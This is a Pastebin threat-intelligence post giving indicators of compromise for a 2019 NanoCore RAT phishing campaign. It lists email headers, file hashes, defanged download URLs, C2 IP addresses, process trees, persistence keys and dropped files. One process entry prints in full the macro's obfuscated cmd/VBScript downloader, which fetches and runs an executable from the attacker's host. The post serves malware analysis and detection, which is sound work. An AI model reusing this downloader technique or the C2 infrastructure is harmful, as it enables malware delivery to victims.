SHARE
TWEET

#nanocore_050819

VRad Aug 7th, 2019 (edited) 169 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #nanocore #RAT #macro
  2.  
  3. https://pastebin.com/yiaWaNvQ
  4.  
  5. previous_contact:
  6. 25/04/19    https://pastebin.com/cSy68j5q
  7. 07/01/19    https://pastebin.com/e5f24Y8F
  8.  
  9. FAQ:        https://krebsonsecurity.com/2018/02/bot-roundup-avalanche-kronos-nanocore/
  10.  
  11. attack_vector
  12. --------------
  13. email attach .DOC > macro > GET JS > GET exe
  14.  
  15. email_headers
  16. --------------
  17. Received: from lrwdd2.directrouter.com (lrwdd2.directrouter.com [206.123.119.186])
  18. Date: Mon, 05 Aug 2019 04:22:00 -0500
  19. From: cellardoor@palmerwines.com.au
  20. To: user00@victim77.com
  21. Subject: Fwd: Purchasing Oder
  22. X-Sender: cellardoor@palmerwines.com.au
  23. User-Agent: Roundcube Webmail/1.3.8
  24.  
  25. files
  26. --------------
  27. SHA-256     ff1fe92b711075243cbb176d5e98dd07478a809db12c2189bb12a3874f10339c
  28. File name   PO URGENT.doc
  29. File size   508 KB (520192 bytes)
  30.  
  31. SHA-256     1148d46151ef33f158bab7fb99a6cd84f3b27a627994bd5f2a55b5fea029e55f
  32. File name   azz.js
  33. File size   80.05 KB (81970 bytes)
  34.  
  35. SHA-256     b3e668b755ceb4754b118ba8ec718755f4dbd37ef572a268e1d5b2a8d6d07ba7
  36. File name   hercilio.exe
  37. File size   203 KB (207872 bytes)
  38.  
  39. activity
  40. **************
  41. PL_SCR
  42. h11ps\kcexports{.} me/azz.js
  43. h11ps\kcexports{.} me/hercilio.exe 
  44.  
  45. C2
  46. 67.207.93.17
  47. 185.244.31.111  1606   
  48.  
  49. netwrk
  50. --------------
  51. [ssl]
  52. 167.71.13.65    kcexports.me    Client Hello   
  53.  
  54. comp
  55. --------------
  56. WINWORD.EXE 2888    TCP localhost   49217   162.255.119.195 443 SYN_SENT   
  57. wscript.exe 1124    TCP localhost   49219   162.255.119.195 443 SYN_SENT                   
  58. wscript.exe 2664    TCP localhost   49222   67.207.93.17    7744    SYN_SENT           
  59. EJV.EXE     1368    TCP localhost   49226   185.244.31.111  1606    SYN_SENT
  60.  
  61. proc
  62. --------------
  63. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  64. "C:\Windows\System32\WScript.exe" "C:\tmp\mczekg5e.js"
  65. "C:\Windows\System32\wscript.exe" //B "C:\Users\operator\AppData\Roaming\KQWPXSGZoR.js"
  66. "C:\Windows\System32\cmd.exe" /c cd %temp% &@echo Y3x = " h11ps\kcexports{.} me/hercilio.exe">>B3g.vbs &@echo W8r = M8m("jo{Sj}j")>>B3g.vbs &@echo Set S5z = CreateObject(M8m("rx}rqWS}rqmyyu"))>>B3g.vbs &@echo S5z.Open M8m("ljy"), Y3x, False>>B3g.vbs &@echo S5z.send ("")>>B3g.vbs &@echo Set J8g = CreateObject(M8m("fitigSxywjfr"))>>B3g.vbs &@echo J8g.Open>>B3g.vbs &@echo J8g.Type = 1 >>B3g.vbs &@echo J8g.Write S5z.ResponseBody>>B3g.vbs & @echo J8g.Position = 0 >>B3g.vbs &@echo J8g.SaveToFile W8r, 2 >>B3g.vbs &@echo J8g.Close>>B3g.vbs  &@echo function M8m(H7m) >> B3g.vbs &@echo For B6c = 1 To Len(H7m) >>B3g.vbs &@echo E7e = Mid(H7m, B6c, 1) >>B3g.vbs &@echo E7e = Chr(Asc(E7e)- 37) >>B3g.vbs &@echo O9c = O9c + E7e >> B3g.vbs &@echo Next >>B3g.vbs &@echo M8m = O9c >>B3g.vbs &@echo End Function >>B3g.vbs& B3g.vbs &dEl B3g.vbs & timeout 13 & EJV.EXE
  67. "C:\Windows\System32\WScript.exe" "C:\tmp\B3g.vbs"  
  68. C:\Windows\SysWOW64\timeout  13
  69. C:\tmp\EJV.EXE
  70.  
  71. persist
  72. --------------
  73. @HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run             05.08.2019 18:05   
  74.  
  75.     ARP Service         c:\users\operator\appdata\roaming\9907dcbd-0284-49da-87e9-3f380347acb7\arp service\arpsv.exe    22.02.2015 3:49
  76.    
  77.     KQWPXSGZoR          c:\users\operator\appdata\roaming\kqwpxsgzor.js 05.08.2019 18:04   
  78. wscript.exe //B "C:\Users\operator\AppData\Roaming\KQWPXSGZoR.js"
  79.  
  80. @C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup                05.08.2019 18:04   
  81.    
  82.     KQWPXSGZoR.js           c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\kqwpxsgzor.js   05.08.2019 18:04
  83.  
  84. drop
  85. --------------
  86. %temp%\mczekg5e.js  [azz[1].js]
  87. %temp%\B3g.vbs     
  88. %temp%\EJV.EXE      [hercilio[1].exe]
  89. C:\Users\operator\AppData\Roaming\KQWPXSGZoR.js
  90. C:\Users\operator\AppData\Roaming\9907DCBD-0284-49DA-87E9-3F380347ACB7\ARP Service\arpsv.exe
  91. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KQWPXSGZoR.js
  92.  
  93. # # #
  94. https://www.virustotal.com/gui/file/ff1fe92b711075243cbb176d5e98dd07478a809db12c2189bb12a3874f10339c/details
  95. https://www.virustotal.com/gui/file/1148d46151ef33f158bab7fb99a6cd84f3b27a627994bd5f2a55b5fea029e55f/details
  96. https://www.virustotal.com/gui/file/b3e668b755ceb4754b118ba8ec718755f4dbd37ef572a268e1d5b2a8d6d07ba7/details
  97. https://analyze.intezer.com/#/analyses/919c9d77-4d63-4f96-a35b-0a5435c1297d
  98.  
  99. VR
  100.  
  101. @
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top